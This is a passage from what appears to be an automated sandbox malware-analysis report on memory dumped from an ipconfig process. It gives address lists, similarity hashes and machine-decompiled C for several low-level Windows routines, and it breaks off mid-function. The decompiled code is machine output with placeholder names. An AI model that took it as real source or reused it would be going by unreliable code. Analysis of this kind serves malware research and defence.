              0x02eef9ae
              0x02e92db8
              0x02e92dc2
              0x02eef9b9
              0x02eef9be
              0x02eef9bf
              0x02eef9bf
              0x02e92dcf
              0x02eef9c9
              0x02e92dd5
              0x02e92dd5
              0x02e92dd5
              0x02e92dde
              0x02e92de1
              0x02e92e70
              0x02e92e72
              0x02e92e72
              0x02e92de7
              0x02e92deb
              0x02e92e7c
              0x02e92e83
              0x02e92e85
              0x02e92e8b
              0x02e92e8d
              0x02e92e92
              0x02e92e92
              0x02e92e85
              0x02e92df1
              0x02e92df7
              0x02e92df9
              0x02e92df9
              0x02e92dfc
              0x02e92dff
              0x02e92e02
              0x00000000
              0x02e92e05
              0x02e92e0c
              0x02eef9d9
              0x02e92e12
              0x02e92e12
              0x02e92e12
              0x02e92e1a
              0x02eef9e3
              0x02eef9e9
              0x02eef9f0
              0x02eef9f6
              0x02eef9f8
              0x02eef9f8
              0x02eef9f0
              0x02e92e23
              0x02eefa02
              0x02eefa03
              0x02eefa05
              0x02eefa06
              0x00000000
              0x02e92e29
              0x02e92e29
              0x02e92e2e
              0x02e92e34
              0x02e92e3e
              0x00000000
              0x00000000
              0x02e92e44
              0x02e92e47
              0x02e92e4d
              0x00000000
              0x00000000
              0x02e92e4f
              0x02e92e54
              0x00000000
              0x00000000
              0x02e92e5a
              0x02e92e5f
              0x02e92e9a
              0x02e92ea4
              0x02e92ea5
              0x02e92ea8
              0x02e92eaf
              0x02e92eb2
              0x02e92eb5
              0x02eefae9
              0x02eefaeb
              0x02eefaed
              0x02eefaef
              0x02eefaf7
              0x02eefaf8
              0x02eefafd
              0x02eefaff
              0x02eefb04
              0x02eefb04
              0x02eefaff
              0x02e92ec0
              0x02e92ec4
              0x02e92ec6
              0x02e92ec8
              0x02eefb14
              0x02eefb18
              0x02eefb1e
              0x02eefb21
              0x02eefb21
              0x02e92ece
              0x02e92ece
              0x02e92ece
              0x02e92ed7
              0x02e92e61
              0x02e92e63
              0x02eefa6b
              0x02eefa71
              0x02eefa76
              0x02eefa78
              0x02eefa8a
              0x02eefa7a
              0x02eefa83
              0x02eefa83
              0x02eefa8f
              0x02eefa91
              0x02eefa97
              0x02eefa9d
              0x02eefaa4
              0x02eefaaa
              0x02eefaaf
              0x02eefab1
              0x02eefac3
              0x02eefab3
              0x02eefabc
              0x02eefabc
              0x02eefac8
              0x02eefacb
              0x02eefadf
              0x02eefadf
              0x02eefacb
              0x02eefaa4
              0x02eefa91
              0x02e92e6f
              0x02e92e6f
              0x02e92e5f
              0x02eefa13
              0x02eefa15
              0x02eefa17
              0x02eefa1f
              0x02eefa21
              0x02eefa22
              0x02eefa25
              0x02eefa28
              0x02eefa2f
              0x02eefa2f
              0x02eefa2a
              0x02eefa2a
              0x02eefa2a
              0x02eefa31
              0x02eefa34
              0x02eefa36
              0x02eefa3c
              0x02eefa3e
              0x02eefa41
              0x02eefa43
              0x02eefa45
              0x02eefa45
              0x02eefa41
              0x02eefa3c
              0x02eefa4a
              0x02eefa4f
              0x02eefa51
              0x02eefa53
              0x02eefa56
              0x02eefa5b
              0x02eefa5e
              0x00000000
              0x02eefa5e
              0x02e92e23

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Re-Waiting
              • API String ID: 0-316354757
              • Opcode ID: c610ef8f1b5eb58699c994ac1689bd8412d6b5f8827ba9465e27c19816495ded
              • Instruction ID: 82a88482022fdc5d1abe49ef9c724ef5d8784f765ed231fe6e28b9b3ac955554
              • Opcode Fuzzy Hash: c610ef8f1b5eb58699c994ac1689bd8412d6b5f8827ba9465e27c19816495ded
              • Instruction Fuzzy Hash: F9615A31A80604AFDF32DF68C880BBEB7B9EB45318F14D656EA169B6D0C7349941CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F60EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E02F60EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E02F5FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E02F61074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E02ED9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E02F5A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E02F5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x2f88b04 >> 0x14) + (_v44 -  *0x2f88b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E02EB7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02F5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E02EB7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E02F4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x2f88724 & 0x00000008) != 0) {
						E02F552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E02F615B5(0x2f88ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























              0x02f60eb7
              0x02f60eb9
              0x02f60ec0
              0x02f60ec2
              0x02f60ecd
              0x02f6105b
              0x02f6105b
              0x02f61061
              0x02f61066
              0x02f61066
              0x02f6106b
              0x02f61073
              0x02f61073
              0x02f60ed3
              0x02f60ed6
              0x02f60edc
              0x02f60ee0
              0x02f60ee7
              0x02f60ef0
              0x02f60ef5
              0x02f60efa
              0x02f60efc
              0x02f60efd
              0x02f60f03
              0x02f60f04
              0x02f60f06
              0x02f60f07
              0x02f60f09
              0x02f60f0e
              0x02f60f14
              0x02f60f23
              0x02f60f2d
              0x02f60f34
              0x02f60f34
              0x02f60f14
              0x02f60f52
              0x00000000
              0x00000000
              0x02f60f58
              0x02f60f73
              0x02f60f74
              0x02f60f79
              0x02f60f7d
              0x02f60f80
              0x02f60f86
              0x02f60fab
              0x02f60fb5
              0x02f60fc6
              0x02f60fd1
              0x02f60fe3
              0x02f60fd3
              0x02f60fdc
              0x02f60fdc
              0x02f60feb
              0x02f61009
              0x02f61009
              0x02f61015
              0x02f61027
              0x02f61017
              0x02f61020
              0x02f61020
              0x02f6102f
              0x02f6103c
              0x02f6103c
              0x02f61048
              0x02f61050
              0x02f61050
              0x02f61055
              0x00000000
              0x02f61055
              0x02f60f88
              0x02f60f9e
              0x02f60fa2
              0x02f60fa9
              0x00000000
              0x00000000
              0x00000000
              0x02f60fa9
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: 2e39684077b7e7eff918926285573de23a46fa53d07fce4bcc74a76c6cd25bbd
              • Instruction ID: 8396c09a0ae76c9406d09772fa01b67079a4a8afb2f6d426160515ebed8807b9
              • Opcode Fuzzy Hash: 2e39684077b7e7eff918926285573de23a46fa53d07fce4bcc74a76c6cd25bbd
              • Instruction Fuzzy Hash: 9B51B171204381AFD725DF18D988B2BB7E6FBC4784F144A2CFA5697290D770E805CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E02ECF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E02EB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E02ED9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E02ED9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E02ED95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x402bf01a
							_t109 = L02EB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000402b
								E02EDF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000402b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E02ED95D0();
										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























              0x02ecf0d3
              0x02ecf0d9
              0x02ecf0e0
              0x02ecf0e7
              0x02ecf0f2
              0x02ecf0f4
              0x02ecf0f8
              0x02ecf100
              0x02ecf108
              0x02ecf10d
              0x02ecf115
              0x02ecf116
              0x02ecf11f
              0x02ecf123
              0x02ecf124
              0x02ecf12c
              0x02ecf130
              0x02ecf134
              0x02ecf13d
              0x02ecf144
              0x02ecf14b
              0x02ecf152
              0x02f0bab0
              0x02f0bab0
              0x02ecf158
              0x02ecf158
              0x02ecf15a
              0x02ecf160
              0x02ecf165
              0x02ecf166
              0x02ecf16f
              0x02ecf173
              0x02f0baa7
              0x02f0baa7
              0x02f0baab
              0x00000000
              0x02ecf179
              0x02ecf179
              0x02ecf18d
              0x02ecf191
              0x02f0baa2
              0x00000000
              0x02ecf197
              0x02ecf19b
              0x02ecf1a2
              0x02ecf1a9
              0x02ecf1af
              0x02ecf1b2
              0x02ecf1b6
              0x02ecf1b9
              0x02ecf1c0
              0x02ecf1c4
              0x02ecf1d8
              0x02ecf1df
              0x02ecf1e3
              0x02ecf1e6
              0x02ecf1eb
              0x02ecf1ee
              0x02ecf1f4
              0x02ecf20f
              0x02f0bab7
              0x02f0babb
              0x02f0bacc
              0x02f0bad1
              0x02ecf215
              0x02ecf218
              0x02ecf226
              0x02ecf22b
              0x00000000
              0x02ecf22b
              0x02ecf1f6
              0x02ecf1f6
              0x02ecf1f9
              0x02ecf1fb
              0x02ecf1fb
              0x02ecf1f4
              0x02ecf191
              0x02ecf173
              0x02ecf152
              0x02ecf203

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction ID: c118c1e322fc31bae6ab7547d01b66219aabd306ab24f828c9dcfdd5adf65ef5
              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction Fuzzy Hash: 1D51BD71540710AFC321CF69C840A6BB7F9FF88714F108A2EFA9597691E7B4E901CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F13540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E02F13540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x2f8d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E02ED0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E02F13706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E02EDFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E02F13540;
						E02EDFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E02EEDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E02F20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E02ED97C0();
					}
					return E02EDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E02F13971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E02F13884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E02EDFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E02ED9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E02F13787(_a4,  &_v352, _t80);
						}
					}
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E02ED95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































              0x02f13552
              0x02f1355a
              0x02f1355d
              0x02f13566
              0x02f13567
              0x02f1357e
              0x02f1358f
              0x02f135a1
              0x02f135a5
              0x02f1366b
              0x02f1366b
              0x02f1366d
              0x02f13672
              0x02f13679
              0x02f13685
              0x02f1368d
              0x02f1369d
              0x02f136a7
              0x02f136b8
              0x02f136c6
              0x02f136c7
              0x02f136dc
              0x02f136e1
              0x02f136e7
              0x02f136e9
              0x02f136e9
              0x02f13703
              0x02f13703
              0x02f135b5
              0x02f135c0
              0x02f135c4
              0x00000000
              0x00000000
              0x02f135ca
              0x02f135d7
              0x02f135e2
              0x02f135e6
              0x02f135e8
              0x02f135f5
              0x02f135fa
              0x02f13603
              0x02f13604
              0x02f13609
              0x02f1360a
              0x02f13612
              0x02f13613
              0x02f1361e
              0x02f13622
              0x02f13628
              0x02f1362f
              0x02f1362f
              0x02f13636
              0x02f13638
              0x02f1363b
              0x02f13642
              0x02f13642
              0x02f13636
              0x02f13657
              0x02f13657
              0x02f1365c
              0x02f13662
              0x02f13669
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: BinaryHash
              • API String ID: 0-2202222882
              • Opcode ID: d5908c19c9c4822c4eef141bf128be41797f1d363f51be9ec6af17d63f243481
              • Instruction ID: 59aba9cab14991e999c12e0b9026148cf8a3ec76c03b441883bd308b07aa3436
              • Opcode Fuzzy Hash: d5908c19c9c4822c4eef141bf128be41797f1d363f51be9ec6af17d63f243481
              • Instruction Fuzzy Hash: 2F4121B2D4056C9ADB21DA50CC80FAEB77DAB45758F4085E5EB09AB240DB309E898F94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F605AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E02F605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E02F607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E02ED9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E02F5A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E02F5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E02F61293(_t79, _v40, E02F607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E02EB7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E02F5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















              0x02f605c5
              0x02f605ca
              0x02f605d3
              0x02f606db
              0x02f606db
              0x02f606dd
              0x02f606e3
              0x02f606e3
              0x02f605dd
              0x02f605e7
              0x02f605f6
              0x02f60600
              0x02f60607
              0x02f60610
              0x02f60615
              0x02f6061a
              0x02f6061c
              0x02f6061e
              0x02f60624
              0x02f60625
              0x02f60627
              0x02f60628
              0x02f60631
              0x02f60640
              0x02f6064d
              0x02f60654
              0x02f60654
              0x02f60631
              0x02f6066d
              0x02f60674
              0x00000000
              0x00000000
              0x02f60692
              0x02f6069e
              0x02f606b0
              0x02f606a0
              0x02f606a9
              0x02f606a9
              0x02f606b8
              0x02f606d6
              0x02f606d6
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
              • Instruction ID: 3b66de118f6263a340077e319177c27278a0617a1dce5a87965836b3df2cb1cd
              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
              • Instruction Fuzzy Hash: 6F31E2326003556BE710DE24CD48FA77799FB84798F144229FB589B2C0DB71E914CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F13884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E02F13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E02ED9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L02EB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E02ED9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















              0x02f13893
              0x02f13896
              0x02f13899
              0x02f1389f
              0x02f138a0
              0x02f138a4
              0x02f138a9
              0x02f138ac
              0x02f138ad
              0x02f138ae
              0x02f138af
              0x02f138b1
              0x02f138b4
              0x02f138bb
              0x02f138bc
              0x02f138bd
              0x02f138c4
              0x02f138c8
              0x02f138ca
              0x02f138ca
              0x02f138d5
              0x02f1393e
              0x02f13940
              0x02f13942
              0x02f13952
              0x02f13954
              0x02f13961
              0x02f13961
              0x02f13967
              0x02f1396e
              0x02f1396e
              0x02f13947
              0x02f1394c
              0x00000000
              0x02f1394c
              0x02f138ea
              0x02f138ee
              0x02f138f8
              0x02f138f9
              0x02f138ff
              0x02f13900
              0x02f13902
              0x02f13903
              0x02f1390b
              0x02f1390f
              0x02f13950
              0x00000000
              0x02f13950
              0x02f13915
              0x02f1391d
              0x02f1391d
              0x02f13922
              0x02f13926
              0x00000000
              0x02f13928
              0x02f1392b
              0x02f1392b
              0x02f13935
              0x02f13937
              0x02f13937
              0x00000000
              0x02f13935
              0x02f13926
              0x02f138f0
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: BinaryName
              • API String ID: 0-215506332
              • Opcode ID: 2a8cea6836f797f4a540398561ee51405bba1fa0a7bc89ca8d48b755c21e6636
              • Instruction ID: d70dbcff0270171fa448dcde082dc7144456e2d52786bd8c22a91074e1907d59
              • Opcode Fuzzy Hash: 2a8cea6836f797f4a540398561ee51405bba1fa0a7bc89ca8d48b755c21e6636
              • Instruction Fuzzy Hash: FE310372D00519AFDB15DB58C955EABB776EF80B60F8181A9EE14A7284D7309E00CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
              Download Yara Rule
              C-Code - Quality: 33%
              			E02ECD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2f8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E02EB4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E02EDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
